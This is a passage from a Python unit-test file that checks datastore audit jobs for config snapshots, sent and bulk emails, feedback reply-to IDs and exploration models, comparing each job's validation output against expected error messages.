prod_validation_jobs_one_off
.ConfigPropertySnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
self.config_model.commit(self.admin_id, [])
expected_output = [
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [
(
u'[u\'failed validation check for time field relation check '
'of ConfigPropertySnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id,
self.model_instance.created_on,
self.model_instance.last_updated
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.csrf_model_instance.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ConfigPropertySnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_config_property_model_failure(self):
self.config_model.delete(self.admin_id, '', [])
expected_output = [
(
u'[u\'failed validation check for config_property_ids '
'field check of ConfigPropertySnapshotContentModel\', '
'[u"Entity id config_model-1: based on field '
'config_property_ids having value config_model, '
'expect model ConfigPropertyModel with '
'id config_model but it doesn\'t exist", '
'u"Entity id config_model-2: based on field '
'config_property_ids having value config_model, expect model '
'ConfigPropertyModel with id config_model but it '
'doesn\'t exist"]]'
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 1]']
run_job_and_check_output(self, expected_output, literal_eval=True)
def test_invalid_config_property_model_version_in_model_id(self):
model_with_invalid_version_in_id = (
config_models.ConfigPropertySnapshotContentModel(
id='config_model-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for config property model '
'version check of ConfigPropertySnapshotContentModel\', '
'[u\'Entity id config_model-3: ConfigProperty model '
'corresponding to id config_model has a version 1 '
'which is less than the version 3 in snapshot '
'content model id\']]'
),
u'[u\'fully-validated ConfigPropertySnapshotContentModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class SentEmailModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(SentEmailModelValidatorTests, self).setUp()
def mock_generate_hash(
unused_cls, unused_recipient_id, unused_email_subject,
unused_email_body):
return 'Email Hash'
self.sender_email = 'sender@email.com'
self.sender_id = 'sender'
self.sender_model = user_models.UserSettingsModel(
id=self.sender_id, email=self.sender_email)
self.sender_model.put()
self.recipient_email = 'recipient@email.com'
self.recipient_id = 'recipient'
self.recipient_model = user_models.UserSettingsModel(
id=self.recipient_id, email=self.recipient_email)
self.recipient_model.put()
with self.swap(
email_models.SentEmailModel, '_generate_hash',
types.MethodType(mock_generate_hash, email_models.SentEmailModel)):
email_models.SentEmailModel.create(
self.recipient_id, self.recipient_email, self.sender_id,
self.sender_email, feconf.EMAIL_INTENT_SIGNUP,
'Email Subject', 'Email Body', datetime.datetime.utcnow())
self.model_instance = email_models.SentEmailModel.get_by_hash(
'Email Hash')[0]
self.job_class = (
prod_validation_jobs_one_off.SentEmailModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated SentEmailModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of SentEmailModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() - datetime.timedelta(hours=20))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for current time check of '
'SentEmailModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_sender_id(self):
self.sender_model.delete()
expected_output = [(
u'[u\'failed validation check for sender_id field check of '
'SentEmailModel\', '
'[u"Entity id %s: based on field sender_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.sender_id, self.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_recipient_id(self):
self.recipient_model.delete()
expected_output = [(
u'[u\'failed validation check for recipient_id field check of '
'SentEmailModel\', '
'[u"Entity id %s: based on field recipient_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.recipient_id, self.recipient_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_sender_email(self):
self.sender_model.email = 'invalid@email.com'
self.sender_model.put()
expected_output = [(
u'[u\'failed validation check for sender email check of '
'SentEmailModel\', '
'[u\'Entity id %s: Sender email %s in entity does not match with '
'email %s of user obtained through sender id %s\']]') % (
self.model_instance.id, self.model_instance.sender_email,
self.sender_model.email, self.model_instance.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_recipient_email(self):
self.recipient_model.email = 'invalid@email.com'
self.recipient_model.put()
expected_output = [(
u'[u\'failed validation check for recipient email check of '
'SentEmailModel\', '
'[u\'Entity id %s: Recipient email %s in entity does not match '
'with email %s of user obtained through recipient id %s\']]') % (
self.model_instance.id, self.model_instance.recipient_email,
self.recipient_model.email, self.model_instance.recipient_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_sent_datetime_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for sent datetime check of '
'SentEmailModel\', '
'[u\'Entity id %s: The sent_datetime field has a value %s '
'which is greater than the time when the job was run\']]') % (
self.model_instance.id, self.model_instance.sent_datetime)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_instance_with_invalid_id = email_models.SentEmailModel(
id='invalid', recipient_id=self.recipient_id,
recipient_email=self.recipient_email, sender_id=self.sender_id,
sender_email=self.sender_email, intent=feconf.EMAIL_INTENT_SIGNUP,
subject='Email Subject', html_body='Email Body',
sent_datetime=datetime.datetime.utcnow())
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated SentEmailModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'SentEmailModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % 'invalid']
run_job_and_check_output(self, expected_output, sort=True)
class BulkEmailModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(BulkEmailModelValidatorTests, self).setUp()
self.sender_email = 'sender@email.com'
self.sender_id = 'sender'
self.sender_model = user_models.UserSettingsModel(
id=self.sender_id, email=self.sender_email)
self.sender_model.put()
self.recipient_ids = ['recipient1', 'recipient2']
self.recipient_model_1 = user_models.UserSettingsModel(
id=self.recipient_ids[0], email='recipient1@email.com')
self.recipient_model_1.put()
self.recipient_model_2 = user_models.UserSettingsModel(
id=self.recipient_ids[1], email='recipient2@email.com')
self.recipient_model_2.put()
self.model_id = 'bulkemailid1'
email_models.BulkEmailModel.create(
self.model_id, self.recipient_ids, self.sender_id,
self.sender_email, feconf.BULK_EMAIL_INTENT_MARKETING,
'Email Subject', 'Email Body', datetime.datetime.utcnow())
self.model_instance = email_models.BulkEmailModel.get_by_id(
self.model_id)
self.job_class = (
prod_validation_jobs_one_off.BulkEmailModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [u'[u\'fully-validated BulkEmailModel\', 1]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of BulkEmailModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() - datetime.timedelta(hours=20))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for current time check of '
'BulkEmailModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_sender_id(self):
self.sender_model.delete()
expected_output = [(
u'[u\'failed validation check for sender_id field check of '
'BulkEmailModel\', '
'[u"Entity id %s: based on field sender_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.sender_id, self.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_recipient_id(self):
self.recipient_model_1.delete()
expected_output = [(
u'[u\'failed validation check for recipient_id field check of '
'BulkEmailModel\', '
'[u"Entity id %s: based on field recipient_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.recipient_ids[0],
self.recipient_ids[0])]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_sender_email(self):
self.sender_model.email = 'invalid@email.com'
self.sender_model.put()
expected_output = [(
u'[u\'failed validation check for sender email check of '
'BulkEmailModel\', '
'[u\'Entity id %s: Sender email %s in entity does not match with '
'email %s of user obtained through sender id %s\']]') % (
self.model_instance.id, self.model_instance.sender_email,
self.sender_model.email, self.model_instance.sender_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_sent_datetime_greater_than_current_time(self):
self.model_instance.sent_datetime = (
datetime.datetime.utcnow() + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for sent datetime check of '
'BulkEmailModel\', '
'[u\'Entity id %s: The sent_datetime field has a value %s '
'which is greater than the time when the job was run\']]') % (
self.model_instance.id, self.model_instance.sent_datetime)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_id(self):
model_instance_with_invalid_id = email_models.BulkEmailModel(
id='invalid:id', recipient_ids=self.recipient_ids,
sender_id=self.sender_id, sender_email=self.sender_email,
intent=feconf.BULK_EMAIL_INTENT_MARKETING,
subject='Email Subject', html_body='Email Body',
sent_datetime=datetime.datetime.utcnow())
model_instance_with_invalid_id.put()
expected_output = [(
u'[u\'fully-validated BulkEmailModel\', 1]'
), (
u'[u\'failed validation check for model id check of '
'BulkEmailModel\', '
'[u\'Entity id %s: Entity id does not match regex pattern\']]'
) % model_instance_with_invalid_id.id]
run_job_and_check_output(self, expected_output, sort=True)
class GeneralFeedbackEmailReplyToIdModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(GeneralFeedbackEmailReplyToIdModelValidatorTests, self).setUp()
self.thread_id = feedback_services.create_thread(
'exploration', 'expid', None, 'a subject', 'some text')
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.model_instance = (
email_models.GeneralFeedbackEmailReplyToIdModel.create(
self.user_id, self.thread_id))
self.model_instance.put()
self.job_class = (
prod_validation_jobs_one_off
.GeneralFeedbackEmailReplyToIdModelAuditOneOffJob)
def test_standard_model(self):
expected_output = [(
u'[u\'fully-validated GeneralFeedbackEmailReplyToIdModel\', 1]')]
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance.created_on = (
self.model_instance.last_updated + datetime.timedelta(days=1))
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance.id, self.model_instance.created_on,
self.model_instance.last_updated
)]
run_job_and_check_output(self, expected_output)
def test_model_with_last_updated_greater_than_current_time(self):
expected_output = [(
u'[u\'failed validation check for current time check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance.id, self.model_instance.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_user_id(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [(
u'[u\'failed validation check for item.id.user_id field check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u"Entity id %s: based on field item.id.user_id having value '
'%s, expect model UserSettingsModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.user_id, self.user_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_non_existent_thread_id(self):
feedback_models.GeneralFeedbackThreadModel.get_by_id(
self.thread_id).delete()
expected_output = [(
u'[u\'failed validation check for item.id.thread_id field check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u"Entity id %s: based on field item.id.thread_id having value '
'%s, expect model GeneralFeedbackThreadModel with '
'id %s but it doesn\'t exist"]]') % (
self.model_instance.id, self.thread_id, self.thread_id)]
run_job_and_check_output(self, expected_output)
def test_model_with_invalid_reply_to_id(self):
while len(
self.model_instance.reply_to_id) <= (
email_models.REPLY_TO_ID_LENGTH):
self.model_instance.reply_to_id = (
self.model_instance.reply_to_id + 'invalid')
self.model_instance.put()
expected_output = [(
u'[u\'failed validation check for reply_to_id length check of '
'GeneralFeedbackEmailReplyToIdModel\', '
'[u\'Entity id %s: reply_to_id %s should have length less than or '
'equal to %s but instead has length %s\']]'
) % (
self.model_instance.id, self.model_instance.reply_to_id,
email_models.REPLY_TO_ID_LENGTH,
len(self.model_instance.reply_to_id))]
run_job_and_check_output(self, expected_output)
class ExplorationModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
language_codes = ['ar', 'en', 'en']
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
language_code=language_codes[i]
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = exp_models.ExplorationModel.get_by_id('0')
self.model_instance_1 = exp_models.ExplorationModel.get_by_id('1')
self.model_instance_2 = exp_models.ExplorationModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExplorationModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.commit(
feconf.SYSTEM_COMMITTER_ID, 'created_on test', [])
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
self.model_instance_2.delete(feconf.SYSTEM_COMMITTER_ID, 'delete')
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_exploration_schema(self):
expected_output = [
(
u'[u\'failed validation check for domain object check of '
'ExplorationModel\', '
'[u\'Entity id %s: Entity fails domain validation with the '
'error Invalid language_code: %s\']]'
) % (self.model_instance_0.id, self.model_instance_0.language_code),
u'[u\'fully-validated ExplorationModel\', 2]']
with self.swap(
constants, 'ALL_LANGUAGE_CODES', [{
'code': 'en', 'description': 'English'}]):
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_commit_log_entry_model_failure(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
exp_models.ExplorationCommitLogEntryModel.get_by_id(
'exploration-0-1').delete()
expected_output = [
(
u'[u\'failed validation check for '
'exploration_commit_log_entry_ids field check of '
'ExplorationModel\', '
'[u"Entity id 0: based on field '
'exploration_commit_log_entry_ids having value '
'exploration-0-1, expect model ExplorationCommitLogEntryModel '
'with id exploration-0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_summary_model_failure(self):
exp_models.ExpSummaryModel.get_by_id('0').delete()
expected_output = [
(
u'[u\'failed validation check for exp_summary_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field exp_summary_ids having '
'value 0, expect model ExpSummaryModel with id 0 '
'but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_rights_model_failure(self):
exp_models.ExplorationRightsModel.get_by_id(
'0').delete(feconf.SYSTEM_COMMITTER_ID, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_rights_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field exploration_rights_ids '
'having value 0, expect model ExplorationRightsModel '
'with id 0 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_metadata_model_failure(self):
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_metadata_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field snapshot_metadata_ids having '
'value 0-1, expect model ExplorationSnapshotMetadataModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_snapshot_content_model_failure(self):
exp_models.ExplorationSnapshotContentModel.get_by_id(
'0-1').delete()
expected_output = [
(
u'[u\'failed validation check for snapshot_content_ids '
'field check of ExplorationModel\', '
'[u"Entity id 0: based on field snapshot_content_ids having '
'value 0-1, expect model ExplorationSnapshotContentModel '
'with id 0-1 but it doesn\'t exist"]]'),
u'[u\'fully-validated ExplorationModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotMetadataModelValidatorTests(
test_utils.GenericTestBase):
def setUp(self):
super(ExplorationSnapshotMetadataModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
if exp.id != '0':
exp_services.save_new_exploration(self.owner_id, exp)
else:
exp_services.save_new_exploration(self.user_id, exp)
self.model_instance_0 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationSnapshotMetadataModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationSnapshotMetadataModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationSnapshotMetadataModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationSnapshotMetadataModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(
self.user_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field exploration_ids '
'having value 0, expect model ExplorationModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(
self, expected_output, literal_eval=True)
def test_missing_committer_model_failure(self):
user_models.UserSettingsModel.get_by_id(self.user_id).delete()
expected_output = [
(
u'[u\'failed validation check for committer_ids field '
'check of ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: based on field committer_ids having '
'value %s, expect model UserSettingsModel with id %s '
'but it doesn\'t exist"]]'
) % (self.user_id, self.user_id), (
u'[u\'fully-validated '
'ExplorationSnapshotMetadataModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationSnapshotMetadataModel(
id='0-3', committer_id=self.owner_id, commit_type='edit',
commit_message='msg', commit_cmds=[{}]))
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationSnapshotMetadataModel\', '
'[u\'Entity id 0-3: Exploration model corresponding to '
'id 0 has a version 1 which is less than the version 3 in '
'snapshot metadata model id\']]'
), (
u'[u\'fully-validated ExplorationSnapshotMetadataModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_invalid_commit_cmd_schmea(self):
self.model_instance_0.commit_cmds = [{
'cmd': 'add_state'
}, {
'cmd': 'delete_state',
'invalid_attribute': 'invalid'
}]
self.model_instance_0.put()
expected_output = [
(
u'[u\'failed validation check for commit '
'cmd delete_state check of '
'ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'delete_state\', '
'u\'invalid_attribute\': u\'invalid\'} failed with error: '
'The following required attributes are missing: '
'state_name, The following extra attributes are present: '
'invalid_attribute"]]'
), (
u'[u\'failed validation check for commit '
'cmd add_state check of '
'ExplorationSnapshotMetadataModel\', '
'[u"Entity id 0-1: Commit command domain validation '
'for command: {u\'cmd\': u\'add_state\'} '
'failed with error: The following required attributes '
'are missing: state_name"]]'
), u'[u\'fully-validated ExplorationSnapshotMetadataModel\', 2]']
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationSnapshotContentModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationSnapshotContentModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
self.model_instance_0 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'0-1'))
self.model_instance_1 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'1-1'))
self.model_instance_2 = (
exp_models.ExplorationSnapshotContentModel.get_by_id(
'2-1'))
self.job_class = (
prod_validation_jobs_one_off
.ExplorationSnapshotContentModelAuditOneOffJob)
def test_standard_operation(self):
exp_services.update_exploration(
self.owner_id, '0', [exp_domain.ExplorationChange({
'cmd': 'edit_exploration_property',
'property_name': 'title',
'new_value': 'New title'
})], 'Changes.')
expected_output = [
u'[u\'fully-validated ExplorationSnapshotContentModel\', 4]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
self.model_instance_0.last_updated + datetime.timedelta(days=1))
self.model_instance_0.put()
expected_output = [(
u'[u\'failed validation check for time field relation check '
'of ExplorationSnapshotContentModel\', '
'[u\'Entity id %s: The created_on field has a value '
'%s which is greater than the value '
'%s of last_updated field\']]') % (
self.model_instance_0.id,
self.model_instance_0.created_on,
self.model_instance_0.last_updated
), (
u'[u\'fully-validated '
'ExplorationSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_model_with_last_updated_greater_than_current_time(self):
self.model_instance_1.delete()
self.model_instance_2.delete()
expected_output = [(
u'[u\'failed validation check for current time check of '
'ExplorationSnapshotContentModel\', '
'[u\'Entity id %s: The last_updated field has a '
'value %s which is greater than the time when the job was run\']]'
) % (self.model_instance_0.id, self.model_instance_0.last_updated)]
with self.swap(datetime, 'datetime', MockDatetime13Hours), self.swap(
db.DateTimeProperty, 'data_type', MockDatetime13Hours):
update_datastore_types_for_mock_datetime()
run_job_and_check_output(self, expected_output, sort=True)
def test_missing_exploration_model_failure(self):
exp_models.ExplorationModel.get_by_id('0').delete(self.owner_id, '', [])
expected_output = [
(
u'[u\'failed validation check for exploration_ids '
'field check of ExplorationSnapshotContentModel\', '
'[u"Entity id 0-1: based on field exploration_ids '
'having value 0, expect model ExplorationModel with '
'id 0 but it doesn\'t exist", u"Entity id 0-2: based on field '
'exploration_ids having value 0, expect model '
'ExplorationModel with id 0 but it doesn\'t exist"]]'
), (
u'[u\'fully-validated '
'ExplorationSnapshotContentModel\', 2]')]
run_job_and_check_output(self, expected_output, sort=True)
def test_invalid_exploration_version_in_model_id(self):
model_with_invalid_version_in_id = (
exp_models.ExplorationSnapshotContentModel(
id='0-3'))
model_with_invalid_version_in_id.content = {}
model_with_invalid_version_in_id.put()
expected_output = [
(
u'[u\'failed validation check for exploration model '
'version check of ExplorationSnapshotContentModel\', '
'[u\'Entity id 0-3: Exploration model corresponding to '
'id 0 has a version 1 which is less than '
'the version 3 in snapshot content model id\']]'
), (
u'[u\'fully-validated ExplorationSnapshotContentModel\', '
'3]')]
run_job_and_check_output(self, expected_output, sort=True)
class ExplorationRightsModelValidatorTests(test_utils.GenericTestBase):
def setUp(self):
super(ExplorationRightsModelValidatorTests, self).setUp()
self.signup(self.OWNER_EMAIL, self.OWNER_USERNAME)
self.signup(USER_EMAIL, USER_NAME)
self.user_id = self.get_user_id_from_email(USER_EMAIL)
self.owner_id = self.get_user_id_from_email(self.OWNER_EMAIL)
self.owner = user_services.UserActionsInfo(self.owner_id)
editor_email = 'user@editor.com'
viewer_email = 'user@viewer.com'
self.signup(editor_email, 'editor')
self.signup(viewer_email, 'viewer')
self.editor_id = self.get_user_id_from_email(editor_email)
self.viewer_id = self.get_user_id_from_email(viewer_email)
explorations = [exp_domain.Exploration.create_default_exploration(
'%s' % i,
title='title %d' % i,
category='category%d' % i,
) for i in xrange(3)]
for exp in explorations:
exp_services.save_new_exploration(self.owner_id, exp)
rights_manager.assign_role_for_exploration(
self.owner, '0', self.editor_id, rights_manager.ROLE_EDITOR)
rights_manager.assign_role_for_exploration(
self.owner, '2', self.viewer_id, rights_manager.ROLE_VIEWER)
self.model_instance_0 = exp_models.ExplorationRightsModel.get_by_id('0')
self.model_instance_1 = exp_models.ExplorationRightsModel.get_by_id('1')
self.model_instance_2 = exp_models.ExplorationRightsModel.get_by_id('2')
self.job_class = (
prod_validation_jobs_one_off.ExplorationRightsModelAuditOneOffJob)
def test_standard_operation(self):
rights_manager.publish_exploration(self.owner, '0')
expected_output = [
u'[u\'fully-validated ExplorationRightsModel\', 3]']
run_job_and_check_output(self, expected_output)
def test_model_with_created_on_greater_than_last_updated(self):
self.model_instance_0.created_on = (
